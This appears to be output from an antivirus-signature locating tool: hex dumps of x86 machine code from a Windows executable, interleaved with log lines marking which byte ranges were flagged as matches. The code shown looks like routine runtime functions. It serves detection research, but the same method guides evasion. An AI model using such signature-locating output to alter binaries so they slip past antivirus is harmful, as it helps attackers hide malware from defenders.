00009E30   50 E8 E5 C1 FF FF 59 5D C3 8B FF 55 8B EC 8B 45    P.....Y]...U...E
00009E40   08 F0 FF 40 0C 8B 48 7C 85 C9 74 03 F0 FF 01 8B    ...@..H|..t.....
00009E50   88 84 00 00 00 85 C9 74 03 F0 FF 01 8B 88 80 00    .......t........
00009E60   00 00 85 C9 74 03 F0 FF 01 8B 88 8C 00 00 00 85    ....t...........
00009E70   C9 74 03 F0 FF 01 56 6A 06 8D 48 28 5E 81 79 F8    .t....Vj..H(^.y.
00009E80   F8 A1 41 00 74 09 8B 11 85 D2 74 03 F0 FF 02 83    ..A.t.....t.....
00009E90   79 F4 00 74 0A 8B 51 FC 85 D2 74 03 F0 FF 02 83    y..t..Q...t.....
00009EA0   C1 10 83 EE 01 75 D6 FF B0 9C 00 00 00 E8 4C 01    .....u........L.
00009EB0   00 00 59 5E 5D C3 8B FF 55 8B EC 51 53 56 8B 75    ..Y^]...U..QSV.u
00009EC0   08 57 8B 86 88 00 00 00 85 C0 74 6C 3D 28 A7 41    .W........tl=(.A
00009ED0   00 74 65 8B 46 7C 85 C0 74 5E 83 38 00 75 59 8B    .te.F|..t^.8.uY.
00009EE0   86 84 00 00 00 85 C0 74 18 83 38 00 75 13 50 E8    .......t..8.u.P.
00009EF0   27 C1 FF FF FF B6 88 00 00 00 E8 22 FB FF FF 59    '.........."...Y
00009F00   59 8B 86 80 00 00 00 85 C0 74 18 83 38 00 75 13    Y........t..8.u.
00009F10   50 E8 05 C1 FF FF FF B6 88 00 00 00 E8 FE FB FF    P...............
[INFO    ][2023-07-21 13:35:20,519] _scanDataPart() :: Result: 40736-41008 (272b minChunk:256 X)
00009F20   FF 59 59 FF 76 7C E8 F0 C0 FF FF FF B6 88 00 00    .YY.v|..........
00009F30   00 E8 E5 C0 FF FF 59 59 8B 86 8C 00 00 00 85 C0    ......YY........
00009F40   74 45 83 38 00 75 40 8B 86 90 00 00 00 2D FE 00    tE.8.u@......-..
00009F50   00 00 50 E8 C3 C0 FF FF 8B 86 94 00 00 00 BF 80    ..P.............
00009F60   00 00 00 2B C7 50 E8 B0 C0 FF FF 8B 86 98 00 00    ...+.P..........
00009F70   00 2B C7 50 E8 A2 C0 FF FF FF B6 8C 00 00 00 E8    .+.P............
00009F80   97 C0 FF FF 83 C4 10 FF B6 9C 00 00 00 E8 95 00    ................
00009F90   00 00 59 6A 06 58 8D 9E A0 00 00 00 89 45 FC 8D    ..Yj.X.......E..
00009FA0   7E 28 81 7F F8 F8 A1 41 00 74 1D 8B 07 85 C0 74    ~(.....A.t.....t
00009FB0   14 83 38 00 75 0F 50 E8 5F C0 FF FF FF 33 E8 58    ..8.u.P._....3.X
00009FC0   C0 FF FF 59 59 8B 45 FC 83 7F F4 00 74 16 8B 47    ...YY.E.....t..G
00009FD0   FC 85 C0 74 0C 83 38 00 75 07 50 E8 3B C0 FF FF    ...t..8.u.P.;...
00009FE0   59 8B 45 FC 83 C3 04 83 C7 10 83 E8 01 89 45 FC    Y.E...........E.
00009FF0   75 B0 56 E8 23 C0 FF FF 59 5F 5E 5B C9 C3 8B FF    u.V.#...Y_^[....
0000A000   55 8B EC 8B 4D 08 85 C9 74 16 81 F9 A0 38 41 00    U...M...t....8A.
0000A010   74 0E 33 C0 40 F0 0F C1 81 B0 00 00 00 40 5D C3    t.3.@........@].
0000A020   B8 FF FF FF 7F 5D C3 8B FF 55 8B EC 56 8B 75 08    .....]...U..V.u.
[INFO    ][2023-07-21 13:35:21,182] _scanDataPart() :: Result: 41280-41824 (544 bytes)
0000A140   57 E8 3D 00 00 00 59 59 8B F0 89 75 E4 C7 45 FC    W.=...YY...u..E.
0000A150   FE FF FF FF E8 09 00 00 00 85 F6 74 20 EB 0C 8B    ...........t ...
0000A160   75 E4 6A 04 E8 CB F5 FF FF 59 C3 8B C6 8B 4D F0    u.j......Y....M.
0000A170   64 89 0D 00 00 00 00 59 5F 5E 5B C9 C3 E8 58 B4    d......Y_^[...X.
0000A180   FF FF CC 8B FF 55 8B EC 56 8B 75 0C 57 85 F6 74    .....U..V.u.W..t
0000A190   3C 8B 45 08 85 C0 74 35 8B 38 3B FE 75 04 8B C6    <.E...t5.8;.u...
0000A1A0   EB 2D 56 89 30 E8 8F FC FF FF 59 85 FF 74 EF 57    .-V.0.....Y..t.W
0000A1B0   E8 CC FE FF FF 83 7F 0C 00 59 75 E2 81 FF 38 A1    .........Yu...8.
0000A1C0   41 00 74 DA 57 E8 EC FC FF FF 59 EB D1 33 C0 5F    A.t.W.....Y..3._
0000A1D0   5E 5D C3 8B FF 55 8B EC 56 8B 75 0C 85 F6 74 1B    ^]...U..V.u...t.
0000A1E0   6A E0 33 D2 58 F7 F6 3B 45 10 73 0F E8 BA BD FF    j.3.X..;E.s.....
0000A1F0   FF C7 00 0C 00 00 00 33 C0 EB 42 53 8B 5D 08 57    .......3..BS.].W
0000A200   85 DB 74 0B 53 E8 C4 41 00 00 59 8B F8 EB 02 33    ..t.S..A..Y....3
0000A210   FF 0F AF 75 10 56 53 E8 E5 41 00 00 8B D8 59 59    ...u.VS..A....YY
0000A220   85 DB 74 15 3B FE 73 11 2B F7 8D 04 3B 56 6A 00    ..t.;.s.+...;Vj.
0000A230   50 E8 DA 76 FF FF 83 C4 0C 5F 8B C3 5B 5E 5D C3    P..v....._..[^].
0000A240   FF 15 E8 20 41 00 85 C0 A3 B0 B3 41 00 0F 95 C0    ... A......A....
0000A250   C3 83 25 B0 B3 41 00 00 B0 01 C3 8B FF 55 8B EC    ..%..A.......U..
0000A260   53 56 57 8B 7D 08 3B 7D 0C 74 51 8B F7 8B 1E 85    SVW.}.;}.tQ.....
0000A270   DB 74 0E 8B CB FF 15 20 21 41 00 FF D3 84 C0 74    .t..... !A.....t
0000A280   08 83 C6 08 3B 75 0C 75 E4 3B 75 0C 74 2E 3B F7    ....;u.u.;u.t.;.
0000A290   74 26 83 C6 FC 83 7E FC 00 74 13 8B 1E 85 DB 74    t&....~..t.....t
0000A2A0   0D 6A 00 8B CB FF 15 20 21 41 00 FF D3 59 83 EE    .j..... !A...Y..
0000A2B0   08 8D 46 04 3B C7 75 DD 32 C0 EB 02 B0 01 5F 5E    ..F.;.u.2....._^
0000A2C0   5B 5D C3 8B FF 55 8B EC 56 8B 75 0C 39 75 08 74    []...U..V.u.9u.t
0000A2D0   1E 57 8B 7E FC 85 FF 74 0D 6A 00 8B CF FF 15 20    .W.~...t.j..... 
0000A2E0   21 41 00 FF D7 59 83 EE 08 3B 75 08 75 E4 5F B0    !A...Y...;u.u._.
0000A2F0   01 5E 5D C3 8B FF 55 8B EC 8B 45 08 A3 B4 B3 41    .^]...U...E....A
0000A300   00 5D C3 8B FF 55 8B EC 56 E8 22 00 00 00 8B F0    .]...U..V.".....
0000A310   85 F6 74 17 FF 75 08 8B CE FF 15 20 21 41 00 FF    ..t..u..... !A..
0000A320   D6 59 85 C0 74 05 33 C0 40 EB 02 33 C0 5E 5D C3    .Y..t.3.@..3.^].
0000A330   6A 0C 68 C8 91 41 00 E8 B4 70 FF FF 83 65 E4 00    j.h..A...p...e..
0000A340   6A 00 E8 A5 F3 FF FF 59 83 65 FC 00 8B 35 04 A0    j......Y.e...5..
0000A350   41 00 8B CE 83 E1 1F 33 35 B4 B3 41 00 D3 CE 89    A......35..A....
[INFO    ][2023-07-21 13:35:22,097] _scanDataPart() :: Result: 42096-42368 (272b minChunk:256 X)
0000A470   F8 50 8D 45 FF 50 8D 45 F4 50 E8 0D FF FF FF C9    .P.E.P.E.P......
0000A480   C3 8B FF 55 8B EC 8B 45 08 A3 B8 B3 41 00 A3 BC    ...U...E....A...
0000A490   B3 41 00 A3 C0 B3 41 00 A3 C4 B3 41 00 5D C3 6A    .A....A....A.].j
0000A4A0   24 68 E8 91 41 00 E8 45 6F FF FF 83 65 E0 00 83    $h..A..Eo...e...
0000A4B0   65 D0 00 B1 01 88 4D E7 8B 75 08 6A 08 5B 3B F3    e.....M..u.j.[;.
0000A4C0   7F 18 74 37 8D 46 FF 83 E8 01 74 22 48 83 E8 01    ..t7.F....t"H...
0000A4D0   74 29 48 83 E8 01 75 47 EB 14 83 FE 0B 74 1C 83    t)H...uG.....t..
0000A4E0   FE 0F 74 0A 83 FE 14 7E 36 83 FE 16 7F 31 56 E8    ..t....~6....1V.
0000A4F0   FC FE FF FF 83 C4 04 8B F8 EB 3E E8 E3 CE FF FF    ..........>.....
0000A500   8B F8 89 7D E0 85 FF 75 08 83 C8 FF E9 5D 01 00    ...}...u.....]..
0000A510   00 FF 37 56 E8 19 FF FF FF 59 59 85 C0 75 12 E8    ..7V.....YY..u..
0000A520   87 BA FF FF C7 00 16 00 00 00 E8 BF B9 FF FF EB    ................
0000A530   D8 8D 78 08 32 C9 88 4D E7 89 7D DC 83 65 D4 00    ..x.2..M..}..e..
0000A540   84 C9 74 0B 6A 03 E8 A1 F1 FF FF 59 8A 4D E7 83    ..t.j......Y.M..
0000A550   65 D8 00 C6 45 E6 00 83 65 FC 00 8B 3F 84 C9 74    e...E...e...?..t
0000A560   14 8B 0D 04 A0 41 00 83 E1 1F 33 3D 04 A0 41 00    .....A....3=..A.
0000A570   D3 CF 8A 4D E7 89 7D D8 83 FF 01 0F 94 C0 88 45    ...M..}........E
[INFO    ][2023-07-21 13:35:22,099] _scanDataPart() :: Result: 42912-43456 (544 bytes)
0000A7A0   55 F4 8B 45 F8 A8 3F 74 28 8B C8 23 CE C1 E1 04    U..E..?t(..#....
0000A7B0   A8 04 74 03 83 C9 08 A8 08 74 03 83 C9 04 A8 10    ..t......t......
0000A7C0   74 03 83 C9 02 A8 20 74 02 0B CE A8 02 74 02 0B    t..... t.....t..
0000A7D0   CF 0B CA 8B C1 5F EB 3C 66 8B 4D FC 33 C0 F6 C1    ....._.<f.M.3...
0000A7E0   3F 74 31 0F B7 C1 23 C6 C1 E0 04 F6 C1 04 74 03    ?t1...#.......t.
0000A7F0   83 C8 08 F6 C1 08 74 03 83 C8 04 F6 C1 10 74 03    ......t.......t.
0000A800   83 C8 02 F6 C1 20 74 02 0B C6 F6 C1 02 74 05 0D    ..... t......t..
0000A810   00 00 08 00 5E C9 C3 8B FF 55 8B EC 83 EC 10 9B    ....^....U......
0000A820   D9 7D F8 66 8B 45 F8 0F B7 C8 83 E1 01 C1 E1 04    .}.f.E..........
0000A830   A8 04 74 03 83 C9 08 A8 08 74 03 83 C9 04 A8 10    ..t......t......
0000A840   74 03 83 C9 02 A8 20 74 03 83 C9 01 A8 02 74 06    t..... t......t.
0000A850   81 C9 00 00 08 00 53 56 0F B7 F0 BB 00 0C 00 00    ......SV........
0000A860   8B D6 57 BF 00 02 00 00 23 D3 74 26 81 FA 00 04    ..W.....#.t&....
0000A870   00 00 74 18 81 FA 00 08 00 00 74 0C 3B D3 75 12    ..t.......t.;.u.
0000A880   81 C9 00 03 00 00 EB 0A 0B CF EB 06 81 C9 00 01    ................
0000A890   00 00 81 E6 00 03 00 00 74 0C 3B F7 75 0E 81 C9    ........t.;.u...
0000A8A0   00 00 01 00 EB 06 81 C9 00 00 02 00 0F B7 C0 BA    ................
0000A8B0   00 10 00 00 85 C2 74 06 81 C9 00 00 04 00 8B 7D    ......t........}
0000A8C0   0C 8B F7 8B 45 08 F7 D6 23 F1 23 C7 0B F0 3B F1    ....E...#.#...;.
0000A8D0   0F 84 A8 00 00 00 56 E8 3C 02 00 00 59 66 89 45    ......V.<...Yf.E
0000A8E0   FC D9 6D FC 9B D9 7D FC 66 8B 45 FC 0F B7 F0 83    ..m...}.f.E.....
0000A8F0   E6 01 C1 E6 04 A8 04 74 03 83 CE 08 A8 08 74 03    .......t......t.
0000A900   83 CE 04 A8 10 74 03 83 CE 02 A8 20 74 03 83 CE    .....t..... t...
0000A910   01 A8 02 74 06 81 CE 00 00 08 00 0F B7 D0 8B CA    ...t............
0000A920   23 CB 74 2A 81 F9 00 04 00 00 74 1C 81 F9 00 08    #.t*......t.....
0000A930   00 00 74 0C 3B CB 75 16 81 CE 00 03 00 00 EB 0E    ..t.;.u.........
0000A940   81 CE 00 02 00 00 EB 06 81 CE 00 01 00 00 81 E2    ................
0000A950   00 03 00 00 74 10 81 FA 00 02 00 00 75 0E 81 CE    ....t.......u...
0000A960   00 00 01 00 EB 06 81 CE 00 00 02 00 0F B7 C0 BA    ................
0000A970   00 10 00 00 85 C2 74 06 81 CE 00 00 04 00 83 3D    ......t........=
0000A980   18 AC 41 00 01 0F 8C 86 01 00 00 81 E7 1F 03 08    ..A.............
0000A990   03 0F AE 5D F0 8B 4D F0 8B C1 C1 E8 03 83 E0 10    ...]..M.........
0000A9A0   F7 C1 00 02 00 00 74 03 83 C8 08 F7 C1 00 04 00    ......t.........
0000A9B0   00 74 03 83 C8 04 F7 C1 00 08 00 00 74 03 83 C8    .t..........t...
[INFO    ][2023-07-21 13:35:22,101] _scanDataPart() :: Result: 43456-44000 (544 bytes)
0000A9C0   02 85 CA 74 03 83 C8 01 F7 C1 00 01 00 00 74 05    ...t..........t.
0000A9D0   0D 00 00 08 00 8B D1 BB 00 60 00 00 23 D3 74 27    .........`..#.t'
0000A9E0   81 FA 00 20 00 00 74 1A 81 FA 00 40 00 00 74 0B    ... ..t....@..t.
0000A9F0   3B D3 75 13 0D 00 03 00 00 EB 0C 0D 00 02 00 00    ;.u.............
0000AA00   EB 05 0D 00 01 00 00 6A 40 81 E1 40 80 00 00 5B    .......j@..@...[
0000AA10   2B CB 74 1A 81 E9 C0 7F 00 00 74 0B 2B CB 75 13    +.t.......t.+.u.
0000AA20   0D 00 00 00 01 EB 0C 0D 00 00 00 03 EB 05 0D 00    ................
0000AA30   00 00 02 8B CF 23 7D 08 F7 D1 23 C8 0B CF 3B C8    .....#}...#...;.
0000AA40   0F 84 B4 00 00 00 51 E8 46 FC FF FF 50 89 45 F4    ......Q.F...P.E.
0000AA50   E8 15 3A 00 00 59 59 0F AE 5D F4 8B 4D F4 8B C1    ..:..YY..]..M...
0000AA60   C1 E8 03 83 E0 10 F7 C1 00 02 00 00 74 03 83 C8    ............t...
0000AA70   08 F7 C1 00 04 00 00 74 03 83 C8 04 F7 C1 00 08    .......t........
0000AA80   00 00 74 03 83 C8 02 F7 C1 00 10 00 00 74 03 83    ..t..........t..
0000AA90   C8 01 F7 C1 00 01 00 00 74 05 0D 00 00 08 00 8B    ........t.......
0000AAA0   D1 BF 00 60 00 00 23 D7 74 27 81 FA 00 20 00 00    ...`..#.t'... ..
0000AAB0   74 1A 81 FA 00 40 00 00 74 0B 3B D7 75 13 0D 00    t....@..t.;.u...
0000AAC0   03 00 00 EB 0C 0D 00 02 00 00 EB 05 0D 00 01 00    ................
0000AAD0   00 81 E1 40 80 00 00 2B CB 74 1A 81 E9 C0 7F 00    ...@...+.t......
0000AAE0   00 74 0B 2B CB 75 13 0D 00 00 00 01 EB 0C 0D 00    .t.+.u..........
0000AAF0   00 00 03 EB 05 0D 00 00 00 02 8B C8 33 C6 0B CE    ............3...
0000AB00   A9 1F 03 08 00 74 06 81 C9 00 00 00 80 8B C1 EB    .....t..........
0000AB10   02 8B C6 5F 5E 5B C9 C3 8B FF 55 8B EC 8B 4D 08    ..._^[....U...M.
0000AB20   8B D1 C1 EA 04 83 E2 01 8B C2 F6 C1 08 74 06 83    .............t..
0000AB30   CA 04 0F B7 C2 F6 C1 04 74 03 83 C8 08 F6 C1 02    ........t.......
0000AB40   74 03 83 C8 10 F6 C1 01 74 03 83 C8 20 F7 C1 00    t.......t... ...
0000AB50   00 08 00 74 03 83 C8 02 56 8B D1 BE 00 03 00 00    ...t....V.......
0000AB60   57 BF 00 02 00 00 23 D6 74 23 81 FA 00 01 00 00    W.....#.t#......
0000AB70   74 16 3B D7 74 0B 3B D6 75 13 0D 00 0C 00 00 EB    t.;.t.;.u.......
0000AB80   0C 0D 00 08 00 00 EB 05 0D 00 04 00 00 8B D1 81    ................
0000AB90   E2 00 00 03 00 74 0C 81 FA 00 00 01 00 75 06 0B    .....t.......u..
0000ABA0   C7 EB 02 0B C6 5F 5E F7 C1 00 00 04 00 74 05 0D    ....._^......t..
0000ABB0   00 10 00 00 5D C3 8B FF 55 8B EC 51 51 66 8B 45    ....]...U..QQf.E
0000ABC0   08 B9 FF FF 00 00 56 66 8B 75 0C 0F B7 D6 66 3B    ......Vf.u....f;
0000ABD0   C1 74 47 B9 00 01 00 00 66 3B C1 73 10 0F B7 C8    .tG.....f;.s....
[INFO    ][2023-07-21 13:35:22,104] _scanDataPart() :: Result: 54880-55424 (544 bytes)
0000D660   F8 1A 00 00 50 E8 D0 1A 00 00 59 C3 8B FF 55 8B    ....P.....Y...U.
0000D670   EC FF 75 0C E8 27 AB FF FF 8B 45 0C 59 8B 40 0C    ..u..'....E.Y.@.
0000D680   90 A8 06 75 1C E8 21 89 FF FF C7 00 09 00 00 00    ...u..!.........
0000D690   8B 45 0C 6A 10 59 83 C0 0C F0 09 08 83 C8 FF 5D    .E.j.Y.........]
0000D6A0   C3 8B 45 0C 8B 40 0C 90 C1 E8 0C A8 01 74 0D E8    ..E..@.......t..
0000D6B0   F7 88 FF FF C7 00 22 00 00 00 EB D4 8B 45 0C 8B    ......"......E..
0000D6C0   40 0C 90 A8 01 74 28 FF 75 0C E8 1B 03 00 00 59    @....t(.u......Y
0000D6D0   8B 4D 0C 83 61 08 00 84 C0 8B 45 0C 74 B5 8B 48    .M..a.....E.t..H
0000D6E0   04 89 08 8B 45 0C 6A FE 59 83 C0 0C F0 21 08 8B    ....E.j.Y....!..
0000D6F0   45 0C 6A 02 59 83 C0 0C F0 09 08 8B 45 0C 6A F7    E.j.Y.......E.j.
0000D700   59 83 C0 0C F0 21 08 8B 45 0C 83 60 08 00 8B 45    Y....!..E..`...E
0000D710   0C 8B 40 0C 90 A9 C0 04 00 00 75 16 FF 75 0C E8    ..@.......u..u..
0000D720   E1 AA FF FF 59 84 C0 75 09 FF 75 0C E8 C2 1C 00    ....Y..u..u.....
0000D730   00 59 53 FF 75 0C 8B 5D 08 53 E8 11 01 00 00 59    .YS.u..].S.....Y
0000D740   59 84 C0 75 11 8B 45 0C 6A 10 59 83 C0 0C F0 09    Y..u..E.j.Y.....
0000D750   08 83 C8 FF EB 03 0F B6 C3 5B 5D C3 8B FF 55 8B    .........[]...U.
0000D760   EC FF 75 0C E8 37 AA FF FF 8B 45 0C 59 8B 40 0C    ..u..7....E.Y.@.
0000D770   90 A8 06 75 1E E8 31 88 FF FF C7 00 09 00 00 00    ...u..1.........
0000D780   8B 45 0C 6A 10 59 83 C0 0C F0 09 08 B8 FF FF 00    .E.j.Y..........
0000D790   00 5D C3 8B 45 0C 8B 40 0C 90 C1 E8 0C A8 01 74    .]..E..@.......t
0000D7A0   0D E8 05 88 FF FF C7 00 22 00 00 00 EB D2 8B 45    ........"......E
0000D7B0   0C 8B 40 0C 90 A8 01 74 28 FF 75 0C E8 29 02 00    ..@....t(.u..)..
0000D7C0   00 59 8B 4D 0C 83 61 08 00 84 C0 8B 45 0C 74 B3    .Y.M..a.....E.t.
0000D7D0   8B 48 04 89 08 8B 45 0C 6A FE 59 83 C0 0C F0 21    .H....E.j.Y....!
0000D7E0   08 8B 45 0C 6A 02 59 83 C0 0C F0 09 08 8B 45 0C    ..E.j.Y.......E.
0000D7F0   6A F7 59 83 C0 0C F0 21 08 8B 45 0C 83 60 08 00    j.Y....!..E..`..
0000D800   8B 45 0C 8B 40 0C 90 A9 C0 04 00 00 75 16 FF 75    .E..@.......u..u
0000D810   0C E8 EF A9 FF FF 59 84 C0 75 09 FF 75 0C E8 D0    ......Y..u..u...
0000D820   1B 00 00 59 56 FF 75 0C 8B 75 08 56 E8 EB 00 00    ...YV.u..u.V....
0000D830   00 59 59 84 C0 75 13 8B 45 0C 6A 10 59 83 C0 0C    .YY..u..E.j.Y...
0000D840   F0 09 08 B8 FF FF 00 00 EB 03 0F B7 C6 5E 5D C3    .............^].
0000D850   8B FF 55 8B EC 56 57 FF 75 0C E8 41 A9 FF FF 59    ..U..VW.u..A...Y
0000D860   8B 4D 0C 8B D0 8B 49 0C 90 F6 C1 C0 0F 84 90 00    .M....I.........
0000D870   00 00 8B 4D 0C 33 FF 8B 41 04 8B 31 2B F0 40 89    ...M.3..A..1+.@.
[INFO    ][2023-07-21 13:35:22,817] _scanDataPart() :: Result: 55424-55968 (544 bytes)
0000D880   01 8B 45 0C 8B 48 18 49 89 48 08 85 F6 7E 24 8B    ..E..H.I.H...~$.
0000D890   45 0C 56 FF 70 04 52 E8 96 DD FF FF 83 C4 0C 8B    E.V.p.R.........
0000D8A0   F8 8B 45 0C 3B FE 8B 48 04 8A 45 08 88 01 0F 94    ..E.;..H..E.....
0000D8B0   C0 EB 65 83 FA FF 74 1B 83 FA FE 74 16 8B C2 8B    ..e...t....t....
0000D8C0   CA 83 E0 3F C1 F9 06 6B C0 38 03 04 8D 20 B0 41    ...?...k.8... .A
0000D8D0   00 EB 05 B8 F8 A0 41 00 F6 40 28 20 74 C3 6A 02    ......A..@( t.j.
0000D8E0   57 57 52 E8 37 10 00 00 23 C2 83 C4 10 83 F8 FF    WWR.7...#.......
0000D8F0   75 AF 8B 45 0C 6A 10 59 83 C0 0C F0 09 08 B0 01    u..E.j.Y........
0000D900   EB 16 6A 01 8D 45 08 50 52 E8 24 DD FF FF 83 C4    ..j..E.PR.$.....
0000D910   0C 48 F7 D8 1A C0 FE C0 5F 5E 5D C3 8B FF 55 8B    .H......_^]...U.
0000D920   EC 56 57 FF 75 0C E8 75 A8 FF FF 59 8B 4D 0C 8B    .VW.u..u...Y.M..
0000D930   D0 8B 49 0C 90 F6 C1 C0 0F 84 93 00 00 00 8B 4D    ..I............M
0000D940   0C 33 FF 8B 41 04 8B 31 2B F0 83 C0 02 89 01 8B    .3..A..1+.......
0000D950   45 0C 8B 48 18 83 E9 02 89 48 08 85 F6 7E 23 8B    E..H.....H...~#.
0000D960   45 0C 56 FF 70 04 52 E8 C6 DC FF FF 83 C4 0C 8B    E.V.p.R.........
0000D970   F8 8B 45 0C 3B FE 8B 48 04 66 8B 45 08 66 89 01    ..E.;..H.f.E.f..
0000D980   EB 61 83 FA FF 74 1B 83 FA FE 74 16 8B C2 8B CA    .a...t....t.....
0000D990   83 E0 3F C1 F9 06 6B C0 38 03 04 8D 20 B0 41 00    ..?...k.8... .A.
0000D9A0   EB 05 B8 F8 A0 41 00 F6 40 28 20 74 C4 6A 02 57    .....A..@( t.j.W
0000D9B0   57 52 E8 68 0F 00 00 23 C2 83 C4 10 83 F8 FF 75    WR.h...#.......u
0000D9C0   B0 8B 45 0C 6A 10 59 83 C0 0C F0 09 08 B0 01 EB    ..E.j.Y.........
0000D9D0   15 6A 02 8D 45 08 50 52 E8 55 DC FF FF 83 C4 0C    .j..E.PR.U......
0000D9E0   83 F8 02 0F 94 C0 5F 5E 5D C3 8B FF 55 8B EC 8B    ......_^]...U...
0000D9F0   45 08 83 EC 10 8B 40 0C 90 C1 E8 03 A8 01 74 04    E.....@.......t.
0000DA00   B0 01 C9 C3 8B 45 08 53 56 8B 40 0C 90 A8 C0 8B    .....E.SV.@.....
0000DA10   45 08 74 07 8B 08 3B 48 04 74 4E 8B 40 10 90 50    E.t...;H.tN.@..P
0000DA20   E8 7C BF FF FF 8B F0 59 83 FE FF 74 3C 33 DB 8D    .|.....Y...t<3..
0000DA30   45 F8 43 53 50 6A 00 6A 00 56 FF 15 FC 20 41 00    E.CSPj.j.V... A.
0000DA40   85 C0 74 25 8D 45 F0 50 56 FF 15 F8 20 41 00 85    ..t%.E.PV... A..
0000DA50   C0 74 16 8B 45 F8 3B 45 F0 75 08 8B 45 FC 3B 45    .t..E.;E.u..E.;E
0000DA60   F4 74 02 32 DB 8A C3 EB 02 32 C0 5E 5B C9 C3 8B    .t.2.....2.^[...
0000DA70   FF 55 8B EC 5D E9 F2 FB FF FF 8B FF 55 8B EC 5D    .U..].......U..]
0000DA80   E9 D7 FC FF FF 8B FF 55 8B EC 8B 4D 08 83 F9 FE    .......U...M....
0000DA90   75 0D E8 14 85 FF FF C7 00 09 00 00 00 EB 38 85    u.............8.
[INFO    ][2023-07-21 13:35:22,818] _printStatus() :: Reducing: 526 chunks done, found 62 matches (192 added)
[INFO    ][2023-07-21 13:35:24,878] _printStatus() :: Reducing: 527 chunks done, found 62 matches (192 added)
[INFO    ][2023-07-21 13:35:24,878] _scanDataPart() :: Result: 55968-56240 (272b minChunk:256 X)
0000DAA0   C9 78 24 3B 0D 20 B2 41 00 73 1C 8B C1 83 E1 3F    .x$;. .A.s.....?
0000DAB0   C1 F8 06 6B C9 38 8B 04 85 20 B0 41 00 0F B6 44    ...k.8... .A...D
0000DAC0   08 28 83 E0 40 5D C3 E8 DF 84 FF FF C7 00 09 00    .(..@]..........
0000DAD0   00 00 E8 17 84 FF FF 33 C0 5D C3 CC CC CC CC CC    .......3.]......
0000DAE0   8B FF 55 8B EC 81 EC 18 01 00 00 A1 04 A0 41 00    ..U...........A.
0000DAF0   33 C5 89 45 FC 8B 4D 0C 53 8B 5D 14 56 8B 75 08    3..E..M.S.].V.u.
0000DB00   89 B5 FC FE FF FF 89 9D F8 FE FF FF 57 8B 7D 10    ............W.}.
0000DB10   89 BD 00 FF FF FF 85 F6 75 25 85 C9 74 21 E8 88    ........u%..t!..
0000DB20   84 FF FF C7 00 16 00 00 00 E8 C0 83 FF FF 8B 4D    ...............M
0000DB30   FC 5F 5E 33 CD 5B E8 9E 2F FF FF 8B E5 5D C3 85    ._^3.[../....]..
0000DB40   FF 74 DB 85 DB 74 D7 C7 85 E8 FE FF FF 00 00 00    .t...t..........
0000DB50   00 83 F9 02 72 D8 49 0F AF CF 03 CE 89 8D 08 FF    ....r.I.........
0000DB60   FF FF 8B C1 33 D2 2B C6 F7 F7 40 83 F8 08 0F 87    ....3.+...@.....
0000DB70   B6 00 00 00 3B CE 0F 86 27 04 00 00 8D 14 37 89    ....;...'.....7.
0000DB80   95 F0 FE FF FF 8B C6 8B F2 89 85 04 FF FF FF 3B    ...............;
0000DB90   F1 77 2F 50 56 8B CB FF 15 20 21 41 00 FF D3 83    .w/PV.... !A....
0000DBA0   C4 08 85 C0 7E 0A 8B C6 89 85 04 FF FF FF EB 06    ....~...........
[INFO    ][2023-07-21 13:35:24,880] _scanDataPart() :: Result: 57328-57600 (272b minChunk:256 X)
0000DFF0   24 EB F1 8B 75 08 8B FF 8A 06 0A C0 74 0C 83 C6    $...u.......t...
0000E000   01 0F A3 04 24 73 F1 8D 46 FF 83 C4 20 5E C9 C3    ....$s..F... ^..
0000E010   8B FF 55 8B EC 51 51 A1 04 A0 41 00 33 C5 89 45    ..U..QQ...A.3..E
0000E020   FC 53 56 8B 75 18 57 85 F6 7E 14 56 FF 75 14 E8    .SV.u.W..~.V.u..
0000E030   1B 14 00 00 59 3B C6 59 8D 70 01 7C 02 8B F0 8B    ....Y;.Y.p.|....
0000E040   7D 24 85 FF 75 0B 8B 45 08 8B 00 8B 78 08 89 7D    }$..u..E....x..}
0000E050   24 33 C0 39 45 28 6A 00 6A 00 0F 95 C0 56 FF 75    $3.9E(j.j....V.u
0000E060   14 8D 04 C5 01 00 00 00 50 57 E8 F4 B0 FF FF 8B    ........PW......
0000E070   D0 83 C4 18 89 55 F8 85 D2 0F 84 58 01 00 00 8D    .....U.....X....
0000E080   04 12 8D 48 08 3B C1 1B C0 23 C1 74 35 3D 00 04    ...H.;...#.t5=..
0000E090   00 00 77 13 E8 C7 2F 00 00 8B DC 85 DB 74 1E C7    ..w.../......t..
0000E0A0   03 CC CC 00 00 EB 13 50 E8 8A 89 FF FF 8B D8 59    .......P.......Y
0000E0B0   85 DB 74 09 C7 03 DD DD 00 00 83 C3 08 8B 55 F8    ..t...........U.
0000E0C0   EB 02 33 DB 85 DB 0F 84 00 01 00 00 52 53 56 FF    ..3.........RSV.
0000E0D0   75 14 6A 01 57 E8 89 B0 FF FF 83 C4 18 85 C0 0F    u.j.W...........
0000E0E0   84 E7 00 00 00 8B 7D F8 33 C0 50 50 50 50 50 57    ......}.3.PPPPPW
0000E0F0   53 FF 75 10 FF 75 0C E8 D8 82 FF FF 8B F0 85 F6    S.u..u..........
[INFO    ][2023-07-21 13:35:25,579] _scanDataPart() :: Result: 57600-58144 (544 bytes)
0000E100   0F 84 C6 00 00 00 BA 00 04 00 00 85 55 10 74 38    ............U.t8
0000E110   8B 45 20 85 C0 0F 84 B3 00 00 00 3B F0 0F 8F A9    .E ........;....
0000E120   00 00 00 33 C9 51 51 51 50 FF 75 1C 57 53 FF 75    ...3.QQQP.u.WS.u
0000E130   10 FF 75 0C E8 9B 82 FF FF 8B F0 85 F6 0F 85 8B    ..u.............
0000E140   00 00 00 E9 84 00 00 00 8D 04 36 8D 48 08 3B C1    ..........6.H.;.
0000E150   1B C0 23 C1 74 2F 3B C2 77 13 E8 01 2F 00 00 8B    ..#.t/;.w.../...
0000E160   FC 85 FF 74 60 C7 07 CC CC 00 00 EB 13 50 E8 C4    ...t`........P..
0000E170   88 FF FF 8B F8 59 85 FF 74 4B C7 07 DD DD 00 00    .....Y..tK......
0000E180   83 C7 08 EB 02 33 FF 85 FF 74 3A 6A 00 6A 00 6A    .....3...t:j.j.j
0000E190   00 56 57 FF 75 F8 53 FF 75 10 FF 75 0C E8 32 82    .VW.u.S.u..u..2.
0000E1A0   FF FF 85 C0 74 1F 33 C0 50 50 39 45 20 75 3A 50    ....t.3.PP9E u:P
0000E1B0   50 56 57 50 FF 75 24 E8 23 B0 FF FF 8B F0 83 C4    PVWP.u$.#.......
0000E1C0   20 85 F6 75 2C 57 E8 4E BC FF FF 59 33 F6 53 E8     ..u,W.N...Y3.S.
